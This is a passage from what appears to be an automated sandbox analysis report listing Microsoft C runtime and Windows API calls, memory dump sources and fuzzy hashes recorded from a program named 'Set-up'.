                                                                                                • Part of subcall function 6BB64F0C: _unlock.MSVCR100(0000000C,6BB64EDD), ref: 6BB64F0E
                                                                                              • _getptd.MSVCR100 ref: 6BB90771
                                                                                              Similarity
                                                                                              • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 2319614578-0
                                                                                              APIs
                                                                                              • free.MSVCR100(?,?,?,?,?), ref: 6BB735BB
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • free.MSVCR100(?,?,?,?,?,?), ref: 6BB735C3
                                                                                              • _errno.MSVCR100 ref: 6BB8831F
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8832A
                                                                                                • Part of subcall function 6BB733B8: _wcslen.LIBCMT(?), ref: 6BB7340B
                                                                                                • Part of subcall function 6BB7373E: _memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
                                                                                                • Part of subcall function 6BB7373E: _calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
                                                                                                • Part of subcall function 6BB7373E: __doserrno.MSVCR100 ref: 6BB7384A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$FreeHeap__doserrno_calloc_crt_errno_invalid_parameter_noinfo_memset_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1030453172-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BB6BBC0
                                                                                              • __AdjustPointer.MSVCR100(00000000,?,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB6BBEF
                                                                                              • __AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB871EB
                                                                                              • memcpy.MSVCR100(?,00000000,00000003,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB87211
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 738859832-0
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,6BB9085F,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71204
                                                                                              • _malloc_crt.MSVCR100(00000002,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71233
                                                                                              • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71242
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7124B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free_malloc_crtmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 202606007-0
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
                                                                                              • _memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1722558631-0
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC97
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                                • Part of subcall function 6BBAABC4: GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
                                                                                                • Part of subcall function 6BBAABC4: GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
                                                                                                • Part of subcall function 6BBAABC4: LoadLibraryW.KERNEL32(?), ref: 6BBAAC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 488853443-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3898388434-0
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB71658,0000000C), ref: 6BB71621
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fwrite_nolock.MSVCR100(?,?,?,?,6BB71658,0000000C), ref: 6BB71636
                                                                                                • Part of subcall function 6BB7153C: memcpy.MSVCR100(?,?,?), ref: 6BB715D5
                                                                                                • Part of subcall function 6BB71674: _unlock_file.MSVCR100(6BB7164D,6BB7164D), ref: 6BB71677
                                                                                              • _errno.MSVCR100(6BB71658,0000000C), ref: 6BB88E41
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB71658,0000000C), ref: 6BB88E4C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fwrite_nolock_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1711487722-0
                                                                                              APIs
                                                                                              • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR100 ref: 6BB95C68
                                                                                                • Part of subcall function 6BBA504E: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,6BB95C6D), ref: 6BBA509A
                                                                                              • __uncaught_exception.MSVCR100 ref: 6BB95C6D
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000001), ref: 6BB95C93
                                                                                              • _CxxThrowException.MSVCR100(6BB95CA8,6BBFFE24,00000001), ref: 6BB95CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Collection@details@Concurrency@@StructuredTask$Abort@_Cancel@_Concurrency::unsupported_os::unsupported_osExceptionThrow__uncaught_exception
                                                                                              • String ID:
                                                                                              • API String ID: 176145414-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB98EA6
                                                                                              • CloseHandle.KERNEL32(?,00000004,6BB98BA2), ref: 6BB98ED0
                                                                                              • CloseHandle.KERNEL32(?,00000004,6BB98BA2), ref: 6BB98EE4
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?), ref: 6BB98F14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$??3@H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 236738836-0
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A961
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A96C
                                                                                                • Part of subcall function 6BB6A8DF: __freebuf.LIBCMT ref: 6BB6A903
                                                                                                • Part of subcall function 6BB6A8DF: _fileno.MSVCR100(?,?,?), ref: 6BB6A909
                                                                                                • Part of subcall function 6BB6A8DF: _close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F
                                                                                                • Part of subcall function 6BB6A9AC: _unlock_file.MSVCR100(?,6BB6A981,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A9AD
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BC3
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BCE
                                                                                              Similarity
                                                                                              • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 1403730806-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9C7E3
                                                                                              • EnterCriticalSection.KERNEL32(?,00000004,6BB987CA,?), ref: 6BB9C7F6
                                                                                                • Part of subcall function 6BB9892E: TlsSetValue.KERNEL32(?,?,?,?,?), ref: 6BB9895B
                                                                                                • Part of subcall function 6BB9892E: GetCurrentThread.KERNEL32 ref: 6BB9898C
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9C830
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB9C83F
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CurrentEnterEventH_prolog3LeaveThreadValue
                                                                                              • String ID:
                                                                                              • API String ID: 2643705923-0
                                                                                              APIs
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6BBA23C6
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6BBA23DE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC00034,?,00000008,00000002), ref: 6BBA23F3
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6BBA23FD
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1427302437-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 972587971-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E83
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E8E
                                                                                                • Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5
                                                                                              • _lock_file.MSVCR100(00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E9B
                                                                                              • _ungetc_nolock.MSVCR100(?,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6EAB
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 3962069902-0
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB718B8,0000000C), ref: 6BB71887
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _ftell_nolock.MSVCR100(?,6BB718B8,0000000C), ref: 6BB71894
                                                                                                • Part of subcall function 6BB717C4: _fileno.MSVCR100(?), ref: 6BB717DD
                                                                                                • Part of subcall function 6BB717C4: _lseek.MSVCR100(00000000,00000000,00000001), ref: 6BB717F5
                                                                                                • Part of subcall function 6BB718D4: _unlock_file.MSVCR100(?,6BB718A9,6BB718B8,0000000C), ref: 6BB718D7
                                                                                              • _errno.MSVCR100(6BB718B8,0000000C), ref: 6BB88DF8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB718B8,0000000C), ref: 6BB88E03
                                                                                              Similarity
                                                                                              • API ID: _errno_fileno_ftell_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2873353448-0
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9615A: TlsGetValue.KERNEL32(?,6BBA558F,00000000,6BBA5EC0,?,?,?,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BB9616F
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB9B171
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFF4C,?), ref: 6BB9B186
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              Strings
                                                                                              • Lock already taken as a writer, xrefs: 6BB9B16A
                                                                                              Similarity
                                                                                              • API ID: Exception$Copy_strRaiseThrowValuestd::exception::_std::exception::exception
                                                                                              • String ID: Lock already taken as a writer
                                                                                              • API String ID: 323788321-3737755527
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(00000001,6BB6B0D8,6BB6BDD8,00000000,00000001), ref: 6BB77D51
                                                                                              • free.MSVCR100(?), ref: 6BB77D77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointerfree
                                                                                              • String ID: csm
                                                                                              • API String ID: 2443025543-1018135373
                                                                                              • Opcode ID: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
                                                                                              • Instruction ID: 8d165b4d280c697bb3355b5d19e4ef6736563e32c167627fc9a7319d6046a92f
                                                                                              • Opcode Fuzzy Hash: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
                                                                                              • Instruction Fuzzy Hash: C2F0BE75606B809BDB34AE33C840D2A73BDEF113513640AACE4B5CA820EBA8D981C780
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: {flat}
                                                                                              • API String ID: 1333004437-2606204563
                                                                                              • Opcode ID: e5aa45e8ec103f22db68782cec6af65725c80779b17fcfd01f4b186736f67c31
                                                                                              • Instruction ID: 0c739a8ac37a3157152ef6466a41bfb269e2bf2ea9ca2d121425f8b2d408ff4c
                                                                                              • Opcode Fuzzy Hash: e5aa45e8ec103f22db68782cec6af65725c80779b17fcfd01f4b186736f67c31
                                                                                              • Instruction Fuzzy Hash: ABF065352542849FCB04CF98E445BE43FB4EB42796F058085EA4C0F252C77AD541CB95
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(6BB9C69C), ref: 6BB9C660
                                                                                              • _CxxThrowException.MSVCR100(00010000,6BBFFE78,6BB9C69C), ref: 6BB9C675
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionThrowstd::exception::exception
                                                                                              • String ID: version
                                                                                              • API String ID: 4279132481-3206337475
                                                                                              • Opcode ID: ee1c6b08f242ebb9b513c31de53fb5cbed85c9a4039126c51aca7813bcba4238
                                                                                              • Instruction ID: 4129ce310cc386aa0d34722cfda02e76d9c815764d3345220f47f5ef5f5840e1
                                                                                              • Opcode Fuzzy Hash: ee1c6b08f242ebb9b513c31de53fb5cbed85c9a4039126c51aca7813bcba4238
                                                                                              • Instruction Fuzzy Hash: 7AF015B1800288BACB10FF65E482BCE7F78EB06388F10D079E82957051DB7CD689CB95

                                                                                              Execution Graph

                                                                                              Execution Coverage:0.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:103
                                                                                              Total number of Limit Nodes:4

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2124E
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC21261
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC2126C
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC21278
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC21286
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: 9a461b435a50f083146edd48ea8e7f9c4d383fab2f7ff4e7b439504277791a5f
                                                                                              • Instruction ID: 6062337d9e69c3108fae3ace94daafc34f455f98d3860b1d7716be737d1020fd
                                                                                              • Opcode Fuzzy Hash: 9a461b435a50f083146edd48ea8e7f9c4d383fab2f7ff4e7b439504277791a5f
                                                                                              • Instruction Fuzzy Hash: 95E0D8B5B3472286DB24DBB8891271E75F06F90615F50046DA156DB780FF7CC740C765

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __iob_func.MSVCR100 ref: 6BC47C6B
                                                                                              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP100 ref: 6BC47C7B
                                                                                                • Part of subcall function 6BC21247: __EH_prolog3.LIBCMT ref: 6BC2124E
                                                                                                • Part of subcall function 6BC21247: std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC21261
                                                                                                • Part of subcall function 6BC21247: ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC2126C
                                                                                                • Part of subcall function 6BC21247: std::locale::locale.LIBCPMT ref: 6BC21278
                                                                                                • Part of subcall function 6BC21247: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC21286
                                                                                                • Part of subcall function 6BC21298: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100 ref: 6BC212AE
                                                                                                • Part of subcall function 6BC43903: __onexit.MSVCRT ref: 6BC4390B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init@?$basic_streambuf@_U?$char_traits@_W@std@@@std@@$??0?$basic_streambuf@??2@D@std@@@std@@H_prolog3MutexMutex::_U?$char_traits@__iob_func__onexitstd::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1300155456-0
